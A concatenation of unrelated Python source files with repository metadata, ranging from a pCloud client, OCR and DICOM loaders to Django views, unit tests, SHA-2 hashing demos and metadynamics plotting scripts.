"""Connection to pcloud.com based on their json protocol.
persistent_params is a dict that augments params on each command,
this is useful for storing auth data.
NOTE: persistent_params overrides any values in params on send_command
"""
self.use_ssl = use_ssl
self.timeout = timeout
if persistent_params is None:
self.persistent_params = {}
else:
self.persistent_params = persistent_params
if auth is not None:
self.auth = auth
self.baseurl = "{protocol}://{server}:{port}/".format(
protocol=use_ssl and 'https' or 'http',
server=server,
port=port or (use_ssl and 443 or 80)
)
def send_command(self, method, **params):
"""Sends command and returns result. Blocks if result is needed.
:param method: the pcloud method to call
:param **params: parameters to be passed to the api, except:
- '_data' is the file data
- '_data_progress_callback' is the upload callback
:returns dictionary returned by the api
"""
data = params.pop('_data', None)
data_progress_callback = params.pop('_data_progress_callback', None)
params.update(self.persistent_params)
#TODO: actually use the callback, probably chunk encoding
        execute_request = requests.get if data is None else requests.put
#FIXME: currently loads the whole file into memory
r = execute_request(self.baseurl + method,
params=params,
data=data,
allow_redirects=False,
timeout=self.timeout)
r.raise_for_status()
return r.json()
| 3.5 | 4 |
foreignLangOCR/lib/detect.py | ravip18596/foreignLangOCR | 1 | 12786297 | <gh_stars>1-10
from tesserocr import PyTessBaseAPI, PSM, RIL, iterate_level
import pytesseract
from PIL import Image
class Const:
lang = 'hin'
psm = 3
def detect_hindi(img: Image):
ocr_api = PyTessBaseAPI(psm=PSM.SPARSE_TEXT, lang=Const.lang)
meta, response = [], []
img_width, img_height = img.size
print("started processing image")
ocr_api.SetImage(img)
ocr_api.Recognize()
level = RIL.TEXTLINE
results = ocr_api.GetIterator()
line = 0
for r in iterate_level(results, level):
text = r.GetUTF8Text(level)
text = text.replace('\n', '')
bb = r.BoundingBox(level)
confidence = r.Confidence(level)
confidence = "{:.2f}".format(confidence)
meta.append({
'text': text,
'confidence': confidence,
'bb_box': bb,
'img_width': img_width,
'img_height': img_height,
'line': line
})
response.append(text)
line += 1
return response
def detect_hindi_tesseract(img: Image):
text = pytesseract.image_to_string(img, lang=Const.lang)
response = text.split('\n')
return response
| 2.828125 | 3 |
manage.py | johannes-gehrs/centos_packages | 9 | 12786298 | from __future__ import absolute_import, division, unicode_literals
import argparse
import sys
import time
import config
import packages
import index
def _stopwatch(start_time):
return "Done. Time elapsed in seconds: " + unicode(time.time() - start_time)
def _download():
start_time = time.time()
print "Starting downloads. This can take up to a few minutes."
packages.download()
print _stopwatch(start_time)
def _index_refresh():
start_time = time.time()
print "Starting indexing. This can take a minute."
index.write_indices()
print _stopwatch(start_time)
def _search(query, os_version):
if not os_version in config.OS_VERSIONS:
print "Unknown os_version."
sys.exit(1)
searchkit = index.searchkit_factory()
searcher = searchkit[os_version]['ix'].searcher()
myparser = searchkit[os_version]['parser']
start_time = time.time()
results = searcher.search(myparser.parse(query))
for result in results:
print result
print _stopwatch(start_time)
def _set_package_timestamp_to_now():
packages.set_timestamp_to_now()
print "Done setting package data timestamp to current time and date."
parser = argparse.ArgumentParser(description='Manage Centos Packages stuff.')
parser.add_argument('--download',
help='Download repo data from web.',
action='store_true')
parser.add_argument('--index',
help='Recreate the search index from the repo data.',
action='store_true')
parser.add_argument('--search',
                    help='Search for packages from the command line.',
action='store')
parser.add_argument('--version',
help='Only with "search" and "timestamp" option. '
'Specifies version to search in.',
action='store')
parser.add_argument('--packages_timestamp',
help="Sets timestamp of package data to now which indicats that "
"they are fresh to webapp.",
action='store_true')
args = parser.parse_args()
if not any([args.download, args.index, args.search, args.packages_timestamp]):
print "At least one option is required. See --help."
sys.exit(1)
def _requires_version():
if not args.version:
print "Please specify version."
sys.exit(1)
if args.download:
_download()
if args.index:
_index_refresh()
if args.search:
_requires_version()
_search(args.search, args.version)
if args.packages_timestamp:
_set_package_timestamp_to_now()
| 2.578125 | 3 |
test/test_processor.py | miguelaferreira/transmission-postprocess | 0 | 12786299 | import unittest
from os import listdir
from os.path import basename, dirname, realpath
from shutil import copy2
from tempfile import NamedTemporaryFile, mkdtemp
from trdone.actions import NoAction, CopyAction, UnrarAction
from trdone.processor import Processor
class TestProcessor(unittest.TestCase):
def test_process_file_when_it_is_a_directory(self):
processor = Processor(None, None)
source = mkdtemp()
action = processor._process_file(source, None)
        self.assertEqual(action, NoAction(source, None))
def test_process_file_when_it_is_a_file(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile()
action = processor._process_file(torrent.name, destination)
        self.assertEqual(action, CopyAction(torrent.name, destination))
def test_process_file_when_it_is_an_archive(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile(suffix='.rar')
action = processor._process_file(torrent.name, destination)
        self.assertEqual(action, UnrarAction(torrent.name, destination))
def test_process(self):
destination = mkdtemp()
torrent = mkdtemp()
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(torrent, destination)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_process_when_paths_are_mapped(self):
destination = mkdtemp()
torrent_base = mkdtemp()
torrent = mkdtemp(dir=torrent_base)
path_mapping = {'some_base': torrent_base}
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(self._build_path('some_base', basename(torrent)), destination, path_mapping)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_execute(self):
pwd = dirname(realpath(__file__))
destination = mkdtemp()
torrent = mkdtemp()
copy2(self._build_path(pwd, 'file.rar'), torrent)
_ = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
_ = torrent + '/file.rar'
processor = Processor(torrent, destination)
processor.process()
processor.execute()
new_torrent_dir = listdir(self._build_path(destination, torrent))
self.assertTrue(basename(torrent) in listdir(destination))
self.assertTrue(basename(some_file.name) in new_torrent_dir)
self.assertTrue('file.txt' in new_torrent_dir)
self.assertTrue('file.rar' not in new_torrent_dir)
@staticmethod
def _build_path(destination, torrent):
return destination + '/' + basename(torrent)
| 2.765625 | 3 |
aoc_2018/day_3/python/test_day3_puzzle1.py | girip11/advent_of_code | 0 | 12786300 | import os
from pathlib import Path
from typing import List
from aoc_2018.day_3.python.day3_puzzle1 import (
Claim,
find_square_inches_with_overlapping_claims,
parse_claim,
)
def get_input(input_file_name: str) -> List[Claim]:
input_file_path: str = os.path.join(Path(os.path.dirname(__file__)).parent, input_file_name)
claims: List[Claim] = []
with open(input_file_path) as input_file:
claims = [parse_claim(claim_str) for claim_str in input_file]
return claims
def test_find_square_inches_with_multiple_claims_simple() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle1_simple_input.txt")) == 4
def test_find_square_inches_with_multiple_claims_complex() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle_input.txt")) == 107663
| 3.28125 | 3 |
p3/test.py | aryan-gupta/MATH1165 | 0 | 12786301 |
import os
for i in range(28):
print("Test case: ", i)
os.system(f"echo {i} | ./a.out | grep \"Enter\"") | 2.40625 | 2 |
src/synamic/core/default_data/__init__.py | SabujXi/SynamicX | 7 | 12786302 | from synamic.core.default_data._manager import DefaultDataManager
| 1.125 | 1 |
odmltables/xls_style.py | fabianschlebusch/python-odmltables | 6 | 12786303 | <filename>odmltables/xls_style.py
# -*- coding: utf-8 -*-
"""
"""
class XlsStyle():
"""
class to create a stylestring to use in xlwt.easyxf
:param backcolor: color of the background of the cell
:param fontcolor: color of the text inside the cell
:param fontstyle: style of the text inside the cell ('bold 1' or '')
:type backcolor: string
:type fontcolor: string
:type fontstyle: string
"""
def __init__(self, backcolor='black', fontcolor='white', fontstyle='bold'):
self.backcolor = backcolor
self.fontcolor = fontcolor
self.fontstyle = fontstyle
def get_style_string(self):
"""
returns a style_string that can be used to create a cell-style with
xlwt.easyxf
"""
s = (f"font: {self.fontstyle} , color {self.fontcolor}; pattern: pattern solid, fore_colour {self.backcolor};")
return s
| 3.421875 | 3 |
edmunds/foundation/testing/testcase.py | LowieHuyghe/edmunds-python | 4 | 12786304 | <gh_stars>1-10
import os
import sys
import threading
import time
import unittest
from edmunds.globals import abc, ABC
import edmunds.support.helpers as helpers
import tempfile
import shutil
class TestCase(unittest.TestCase, ABC):
"""
A UnitTest Test Case
"""
def set_up(self):
"""
Set up the test case
"""
# Create the application
if not hasattr(self, 'app'):
self.app = self.create_application()
# The env testing test file
self.env_testing_test_file = os.path.join(self.app.config.root_path, '.env.testing.test.py')
if os.path.exists(self.env_testing_test_file):
os.remove(self.env_testing_test_file)
self.app = self.create_application()
# Temp dirs and files
self._temp_files = []
self._temp_dirs = []
def tear_down(self):
"""
Tear down the test case
"""
# Remove env-testing-file
if os.path.exists(self.env_testing_test_file):
os.remove(self.env_testing_test_file)
# Clean temp files and dirs
for temp_file in self._temp_files:
if os.path.isfile(temp_file):
os.remove(temp_file)
for temp_dir in self._temp_dirs:
if os.path.isdir(temp_dir):
shutil.rmtree(temp_dir)
@abc.abstractmethod
def create_application(self):
"""
Create the application for testing
:return: Application
:rtype: edmunds.application.Application
"""
pass
def write_config(self, config, overwrite=True):
"""
Write to test config file
:param config: The config to write
:type config: str|list
:param overwrite: Overwrite the current config
:type overwrite: bool
:return: The file written to
:rtype: str
"""
if not os.path.exists(self.env_testing_test_file):
overwrite = True
        write_permissions = 'w' if overwrite else 'a'
with open(self.env_testing_test_file, write_permissions) as f:
f.write('\n')
if isinstance(config, list):
f.writelines(config)
else:
f.write(config)
f.write('\n')
return self.env_testing_test_file
def thread(self, target, count=1000):
"""
Test thread safety of function
:param target: The target function
:type target: Callable
:param count: The call count
:type count: int
"""
for _ in self.thread_iter(target, count):
pass
def thread_iter(self, target, count=1000):
"""
Test thread safety of function
:param target: The target function
:type target: Callable
:param count: The call count
:type count: int
"""
threads = {}
# Make all the threads
for index in range(count):
threads[index] = threading.Thread(target=target)
# Start all the threads (for minimum delay this is done after constructing the threads)
for index in threads:
threads[index].start()
# Wait for each thread to finish
while len(threads) > 0:
for index in list(threads.keys()):
if not threads[index].isAlive():
yield index
del threads[index]
time.sleep(0.01)
def rand_str(self, length=20):
"""
Get random string of certain length
:param length: The length of the string
:return: Random string
"""
return helpers.random_str(length)
def rand_int(self, min, max):
"""
Get random integer
:param min: Minimum value (included)
:param max: Maximum value (included)
:return: Random integer
"""
return helpers.random_int(min, max)
def temp_file(self, only_path=False, suffix='', prefix='tmp'):
"""
Get temp file
:param only_path: Only return the path
:param suffix: File suffix
:param prefix: File prefix
:return: Path to temp file
"""
path = tempfile.mktemp(suffix=suffix, prefix=prefix)
if only_path and os.path.isfile(path):
os.remove(path)
self._temp_files.append(path)
return path
def write_temp_file(self, content, suffix='', prefix='tmp'):
"""
Write to temp file
:param content: The content to write to file
:param suffix: File suffix
:param prefix: File prefix
:return: The file path
"""
path = self.temp_file(suffix=suffix, prefix=prefix)
with open(path, 'w') as file:
file.write(content)
return path
def temp_dir(self, only_path=False, suffix='', prefix='tmp'):
"""
Get temp dir
:param only_path: Only return the path
:param suffix: File suffix
:param prefix: File prefix
:return: Path to temp dir
"""
path = tempfile.mkdtemp(suffix=suffix, prefix=prefix)
if only_path and os.path.isdir(path):
shutil.rmtree(path)
self._temp_dirs.append(path)
return path
def directory(self):
"""
Get the tests directory
:return: Directory
"""
current_dir = os.path.dirname(os.path.abspath(__file__))
tests_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'tests')
tests_dir = os.path.abspath(tests_dir)
return tests_dir
def setUp(self):
self.set_up()
def tearDown(self):
self.tear_down()
def assert_equal(self, a, b, msg=None):
"""
a == b
"""
return self.assertEqual(a, b, msg=msg)
def assert_not_equal(self, a, b, msg=None):
"""
a != b
"""
return self.assertNotEqual(a, b, msg=msg)
def assert_true(self, x, msg=None):
"""
bool(x) is True
"""
return self.assertTrue(x, msg=msg)
def assert_false(self, x, msg=None):
"""
bool(x) is False
"""
return self.assertFalse(x, msg=msg)
def assert_is(self, a, b, msg=None):
"""
a is b
"""
return self.assertIs(a, b, msg=msg)
def assert_is_not(self, a, b, msg=None):
"""
a is not b
"""
return self.assertIsNot(a, b, msg=msg)
def assert_is_none(self, x, msg=None):
"""
x is None
"""
return self.assertIsNone(x, msg=msg)
def assert_is_not_none(self, x, msg=None):
"""
x is not None
"""
return self.assertIsNotNone(x, msg=msg)
def assert_in(self, a, b, msg=None):
"""
a in b
"""
return self.assertIn(a, b, msg=msg)
def assert_not_in(self, a, b, msg=None):
"""
a not in b
"""
return self.assertNotIn(a, b, msg=msg)
def assert_is_instance(self, a, b, msg=None):
"""
isinstance(a, b)
"""
return self.assertIsInstance(a, b, msg=msg)
def assert_not_is_instance(self, a, b, msg=None):
"""
not isinstance(a, b)
"""
return self.assertNotIsInstance(a, b, msg=msg)
def assert_raises(self, exc, *args, **kwds):
"""
fun(*args, **kwds) raises exc
"""
return self.assertRaises(exc, *args, **kwds)
def assert_raises_regexp(self, exc, r, *args, **kwds):
"""
fun(*args, **kwds) raises exc and the message matches regex r
"""
if sys.version_info >= (3, 0):
return self.assertRaisesRegex(exc, r, *args, **kwds)
return self.assertRaisesRegexp(exc, r, *args, **kwds)
def assert_almost_equal(self, a, b, msg=None):
"""
round(a-b, 7) == 0
"""
return self.assertAlmostEqual(a, b, msg=msg)
def assert_not_almost_equal(self, a, b, msg=None):
"""
round(a-b, 7) != 0
"""
return self.assertNotAlmostEqual(a, b, msg=msg)
def assert_greater(self, a, b, msg=None):
"""
a > b
"""
return self.assertGreater(a, b, msg=msg)
def assert_greater_equal(self, a, b, msg=None):
"""
a >= b
"""
return self.assertGreaterEqual(a, b, msg=msg)
def assert_less(self, a, b, msg=None):
"""
a < b
"""
return self.assertLess(a, b, msg=msg)
def assert_less_equal(self, a, b, msg=None):
"""
a <= b
"""
return self.assertLessEqual(a, b, msg=msg)
def assert_regexp_matches(self, s, r, msg=None):
"""
r.search(s)
"""
if sys.version_info >= (3, 0):
return self.assertRegex(s, r, msg=msg)
return self.assertRegexpMatches(s, r, msg=msg)
def assert_not_regexp_matches(self, s, r, msg=None):
"""
not r.search(s)
"""
if sys.version_info >= (3, 0):
return self.assertNotRegex(s, r, msg=msg)
return self.assertNotRegexpMatches(s, r, msg=msg)
def assert_multi_line_equal(self, a, b, msg=None):
"""
strings
"""
return self.assertMultiLineEqual(a, b, msg=msg)
def assert_sequence_equal(self, a, b, msg=None):
"""
sequences
"""
return self.assertSequenceEqual(a, b, msg=msg)
def assert_list_equal(self, a, b, msg=None):
"""
lists
"""
return self.assertListEqual(a, b, msg=msg)
def assert_tuple_equal(self, a, b, msg=None):
"""
tuples
"""
return self.assertTupleEqual(a, b, msg=msg)
def assert_dict_equal(self, a, b, msg=None):
"""
dicts
"""
return self.assertDictEqual(a, b, msg=msg)
def skip(self, reason):
"""
Skip this test
"""
return self.skipTest(reason)
def assert_equal_deep(self, expected, value, check_type=True, msg=None):
"""
Assert equal deep
:param expected: The expected value
:param value: The value
:param check_type: Do type check
:return:
"""
if isinstance(expected, dict):
self.assert_is_instance(value, dict, msg=msg)
for i in range(0, len(expected)):
self.assert_equal_deep(sorted(expected)[i], sorted(value)[i], check_type=check_type, msg=msg)
self.assert_equal_deep(expected[sorted(expected)[i]], value[sorted(value)[i]], check_type=check_type, msg=msg)
elif isinstance(expected, list):
self.assert_is_instance(value, list, msg=msg)
for i in range(0, len(expected)):
self.assert_equal_deep(expected[i], value[i], check_type=check_type, msg=msg)
else:
self.assert_equal(expected, value, msg=msg)
if check_type:
self.assert_is_instance(value, type(expected), msg=msg)
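# Hedged illustration (not part of the original class): a concrete test case only needs to
# implement create_application(); the bootstrap import below is a hypothetical project module.
class ExampleTestCase(TestCase):
    def create_application(self):
        from myproject.bootstrap import create_app  # hypothetical application factory
        return create_app()
    def test_rand_str_length(self):
        self.assert_equal(len(self.rand_str(8)), 8)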
| 2.59375 | 3 |
homeassistant/components/thermostat/proliphix.py | davidedmundson/home-assistant | 0 | 12786305 | <reponame>davidedmundson/home-assistant<gh_stars>0
"""
homeassistant.components.thermostat.proliphix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Proliphix NT10e Thermostat is an ethernet connected thermostat.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.proliphix/
"""
from homeassistant.components.thermostat import (
STATE_COOL, STATE_HEAT, STATE_IDLE, ThermostatDevice)
from homeassistant.const import (
CONF_HOST, CONF_PASSWORD, CONF_USERNAME, TEMP_FAHRENHEIT)
REQUIREMENTS = ['proliphix==0.1.0']
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the Proliphix thermostats. """
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
host = config.get(CONF_HOST)
import proliphix
pdp = proliphix.PDP(host, username, password)
add_devices([
ProliphixThermostat(pdp)
])
class ProliphixThermostat(ThermostatDevice):
""" Represents a Proliphix thermostat. """
def __init__(self, pdp):
self._pdp = pdp
# initial data
self._pdp.update()
self._name = self._pdp.name
@property
def should_poll(self):
""" Polling needed for thermostat.. """
return True
def update(self):
""" Update the data from the thermostat. """
self._pdp.update()
@property
def name(self):
""" Returns the name of the thermostat. """
return self._name
@property
def device_state_attributes(self):
""" Returns device specific state attributes. """
return {
"fan": self._pdp.fan_state
}
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return TEMP_FAHRENHEIT
@property
def current_temperature(self):
""" Returns the current temperature. """
return self._pdp.cur_temp
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._pdp.setback_heat
@property
def operation(self):
""" Returns the current state of the thermostat. """
state = self._pdp.hvac_state
if state in (1, 2):
return STATE_IDLE
elif state == 3:
return STATE_HEAT
elif state == 6:
return STATE_COOL
def set_temperature(self, temperature):
""" Set new target temperature. """
self._pdp.setback_heat = temperature
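# Hedged smoke-test sketch (illustrative only, not part of the Home Assistant platform):
# driving the wrapper directly, assuming the proliphix package is installed and the host is reachable.
def _example_direct_usage(host, username, password):
    import proliphix
    pdp = proliphix.PDP(host, username, password)
    device = ProliphixThermostat(pdp)
    device.update()
    return device.current_temperature, device.operation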
| 2.484375 | 2 |
modules/social_security/reduction_info/code/reduction_add_views.py | xuhuiliang-maybe/ace_office | 1 | 12786306 | # coding=utf-8
import traceback
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse
from django.views.generic.edit import CreateView
from modules.employee_management.employee_info.models import Employee
from modules.share_module.permissionMixin import class_view_decorator
from modules.social_security.reduction_info.models import Reduction
@class_view_decorator(login_required)
@class_view_decorator(permission_required('reduction_info.add_reduction', raise_exception=True))
class ReductionCreate(SuccessMessageMixin, CreateView):
model = Reduction
template_name = "base/document_edit.html"
fields = ["emplyid", "remark", "remark1", "remark2"]
success_message = u"%(emplyid)s 成功创建"
def get_success_url(self):
self.url = reverse('reduction_info:reduction_list', args=())
referrer = self.request.POST.get("referrer", "")
# if referrer:
# self.url = referrer
_addanother = self.request.POST.get("_addanother", "")
if _addanother:
self.url = reverse('reduction_info:reduction_add')
return self.url
# Add extra parameters to the returned context
def get_context_data(self, **kwargs):
context = super(ReductionCreate, self).get_context_data(**kwargs)
context["form_content"] = u"新增减员信息"
referrer = self.request.META.get('HTTP_REFERER', "")
context["referrer"] = referrer
return context
def form_valid(self, form):
# Validate the current logged-in user: if they are not the principal of the entered project, block the entry
try:
login_user = self.request.user
emplyid = self.request.POST.get("emplyid", 0)  # employee ID
if not emplyid:
messages.warning(self.request, u"请选择您所负责的“员工编号”")
return super(ReductionCreate, self).form_invalid(form)
emp_obj = Employee.objects.filter(id=emplyid)
principal = ""
if emp_obj.exists():
principal = emp_obj[0].project_name.principal
if login_user != principal:
messages.warning(self.request, u"请选择您所负责的“员工编号”")
return super(ReductionCreate, self).form_invalid(form)
except:
traceback.print_exc()
return super(ReductionCreate, self).form_valid(form)
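# Hedged wiring sketch (illustrative; the URL name mirrors the reverse() calls above, the
# project's real urls.py may differ):
def _example_urlpatterns():
    from django.conf.urls import url
    return [url(r'^reduction/add/$', ReductionCreate.as_view(), name='reduction_add')]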
| 1.835938 | 2 |
ltr/dataset/lumbar3d.py | DeepBrainsMe/PyDoctor_Final | 1 | 12786307 | import json
import os
import SimpleITK as sitk
import numpy
import pydicom
import numpy as np
from ltr.admin.environment import env_settings
from ltr.data.processing_utils import str_analyse
from ltr.dataset.base_dataset import BaseDataset
from pydoctor.evaluation import Study
from pydoctor.evaluation.data import StudyList
def _read_file(path):
with open(path, 'r') as f:
json_file = json.loads(f.read())
return json_file
class Lumbar3d(BaseDataset):
"""
The Lumbar dataset from the official TianChi competition,
organized as follows.
-lumbar
-lumbar_testA50
-study...
-lumbar_train150
-study...
-lumbar_train51
-study...
lumbar_train150_annotation.json
lumbar_train51_annotation.json
"""
def __init__(self, root=None, split='train'):
"""
args:
:param root:path to the lumbar dataset.
:param split: string name 'train','val','test'
"""
root = env_settings().lumbar_dir if root is None else root
super().__init__('lumbar', root)
# dataset split for competition.
if split == 'train':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train150')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train150_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'val':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train51')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train51_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'testA':
self.studies_path = os.path.join(root,'datasetA','lumbar_testA50')
elif split == 'testB':
self.studies_path = os.path.join(root, 'datasetB', 'lumbar_testB50')
else:
raise ValueError('Unknown split name.')
# All folders inside the root.
self.study_list = self._get_study_list()
self.body_id = {'L1':0,'L2':1,'L3':2,'L4':3,'L5':4}
self.body_class = {'V1':0,'V2':1}
self.disc_id = {'T12-L1':0,'L1-L2':1,'L2-L3':2,'L3-L4':3,'L4-L5':4,'L5-S1':5}
self.disc_class = {'V1':0,'V2':1,'V3':2,'V4':3,'V5':4}
def _get_study_list(self):
return os.listdir(self.studies_path)
def get_name(self):
return 'lumbar'
def _get_study_path(self, std_id):
return os.path.join(self.studies_path, self.study_list[std_id])
def _get_key_image_info(self, folder,frame_num=3):
global key_image_path
reader = sitk.ImageSeriesReader()
file_path = os.path.join(folder, os.listdir(folder)[0])
study_uid = pydicom.read_file(file_path).get(0x0020000d).value
study_meta = self.anno_meta[str(study_uid)]
dicom_path_list = reader.GetGDCMSeriesFileNames(folder, study_meta['seriesUid'])
dicom_slice = [[pydicom.read_file(file), file] for file in dicom_path_list]
dicom_slice.sort(key=lambda x: float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(dicom_path_list) // 2][1]
middile_index = study_meta['point'][0]['zIndex']
frame_list = []
for dcm_path in range(middile_index - frame_num // 2,middile_index + frame_num // 2 + 1,1):
frame_list.append(np.squeeze(sitk.GetArrayFromImage(sitk.ReadImage(dicom_slice[dcm_path][1]))))
key_image = numpy.stack(frame_list,axis=0)
key_image = np.uint8((key_image - key_image.min()) / (key_image.max() - key_image.min()) * 255.0)
return key_image, study_meta['point']
def _load_anno(self, anno_path):
anno_list = _read_file(anno_path)
anno_dict = {}
for anno in anno_list:
tmp_dict = {anno['studyUid']: {'seriesUid': anno['data'][0]['seriesUid'],
'instanceUid': anno['data'][0]['instanceUid'],
'point': anno['data'][0]['annotation'][0]['data']['point']}}
anno_dict.update(tmp_dict)
return anno_dict
def _deal_point_dict(self,point_list):
body_dict,disc_dict = {},{}
for ann in point_list:
coord = ann.get('coord',None)
identification = ann['tag'].get('identification',None)
if identification in self.body_id:
class_num = self.body_class[str_analyse(ann['tag'].get('vertebra','v1').upper())]
body_dict.update({identification:{'coord':coord,'class_num':class_num}})
elif identification in self.disc_id:
class_num = self.disc_class[str_analyse(ann['tag'].get('disc','v1').upper())]
disc_dict.update({identification:{'coord':coord,'class_num':class_num}})
return body_dict, disc_dict
def get_frames(self, std_id, frame_num=5,anno=None):
dicom_folder = self._get_study_path(std_id)
key_frame,point_list = self._get_key_image_info(dicom_folder)
body_dict, disc_dict = self._deal_point_dict(point_list)
return key_frame, body_dict, disc_dict
def get_study_list(self):
return StudyList([self._construct_study(s) for s in self.study_list])
def _construct_study(self,study_name):
study_folder_path = os.path.join(self.studies_path,study_name)
# series_ids = sitk.ImageSeriesReader.GetGDCMSeriesIDs(study_folder_path)
# for id in series_ids:
file_list = [os.path.join(study_folder_path,i) for i in os.listdir(study_folder_path)]
dicom_slice = [[pydicom.read_file(file),file]for file in file_list]
dicom_slice.sort(key=lambda x:float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(file_list)//2][1]
return Study(name=study_name,dataset='lumbar_test',frame_path=data_path,index=len(file_list)//2)
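# Hedged usage sketch (illustrative; the root path must point at a real local copy of the
# TianChi lumbar data for this to run):
def _example_iterate_split(root):
    dataset = Lumbar3d(root=root, split='train')
    for std_id in range(len(dataset.study_list)):
        key_frame, body_dict, disc_dict = dataset.get_frames(std_id)
        yield key_frame.shape, len(body_dict), len(disc_dict)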
| 2.34375 | 2 |
qaforum/utils.py | UREDDY616/IIITVforum | 117 | 12786308 | <gh_stars>100-1000
import pytz
from datetime import datetime
from django.utils import timezone
from math import log
# uses a version of reddit score algorithm
# https://medium.com/hacking-and-gonzo/how-reddit-ranking-algorithms-work-ef111e33d0d9#.aef67efq1
def question_score(question):
creation_date = question.pub_date
score = question.total_points
answers_positive_points = list(
question.answer_set.all().values_list(
'answervote__value', flat=True)).count(True)
answers_negative_points = list(
question.answer_set.all().values_list(
'answervote__value', flat=True)).count(False)
score = score * 2 + answers_positive_points - answers_negative_points
reference_date = pytz.timezone(
timezone.get_default_timezone_name()).localize(datetime(1970, 1, 1))
difference = creation_date - reference_date
difference_seconds = difference.days * 86400 + difference.seconds +\
(float(difference.microseconds) / 1000000)
order = log(max(abs(score), 1), 10)
sign = 1 if score > 0 else -1 if score < 0 else 0
seconds = difference_seconds - 1134028003
return round(sign * order + seconds / 45000, 7)
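# Hedged worked example (illustrative, mirrors the arithmetic above without needing a real
# Question object): the hot-rank combines a log10 term for the adjusted score with an age term.
def _example_score(adjusted_score, seconds_since_epoch):
    order = log(max(abs(adjusted_score), 1), 10)
    sign = 1 if adjusted_score > 0 else -1 if adjusted_score < 0 else 0
    seconds = seconds_since_epoch - 1134028003
    return round(sign * order + seconds / 45000, 7)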
| 2.65625 | 3 |
Hashing/sha2.py | Prakash-sa/Crypto | 0 | 12786309 | import hashlib
# initialize a string (avoid shadowing the built-in str)
message = "Crypto"
# encode the string
encoded_str = message.encode()
# create sha-2 hash objects initialized with the encoded string
hash_obj_sha224 = hashlib.sha224(encoded_str) # SHA224
hash_obj_sha256 = hashlib.sha256(encoded_str) # SHA256
hash_obj_sha384 = hashlib.sha384(encoded_str) # SHA384
hash_obj_sha512 = hashlib.sha512(encoded_str) # SHA512
# print
print("\nSHA224 Hash: ", hash_obj_sha224.hexdigest())
print("\nSHA256 Hash: ", hash_obj_sha256.hexdigest())
print("\nSHA384 Hash: ", hash_obj_sha384.hexdigest())
print("\nSHA512 Hash: ", hash_obj_sha512.hexdigest())
| 3.328125 | 3 |
plot_meta.py | BFYFlorence/RAF | 0 | 12786310 | <gh_stars>0
import matplotlib.pyplot as plt
import numpy as np
target_file = "/Users/erik/Desktop/metadynamics/learn/"
def hills(target_file,dictator=None):
y = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0]!='#':
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8),dpi=80)
ax1 = fig.add_subplot(1,1,1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.plot(range(len(y)),y,color='g',marker='+')
plt.show()
def colvar(target_file, dictator=None):
y1 = []
y2 = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0] != '#':
y1.append(float(record[1]))
y2.append(float(record[2]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.scatter(range(len(y1)), y1, color='r', marker='+')
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
def free_energy(target_file, dictator=None):
x = []
y = []
with open(target_file) as f:
for i in f.readlines():
record = i.strip().split()
print(record)
if record[0][0] != '#':
x.append(float(record[0]))
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('ps')
ax1.set_ylabel(dictator)
ax1.plot(x, y, color='r', marker='+')
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
def convergence(target_file, dictator=None):
for i in range(11):
path = target_file+"fes_{0}.dat".format(i*10)
x = []
y = []
with open(path) as f:
for i in f.readlines():
record = i.strip().split()
# print(record)
if record[0][0] != '#':
x.append(float(record[0]))
y.append(float(record[1]))
fig = plt.figure(num=1, figsize=(15, 8), dpi=80)
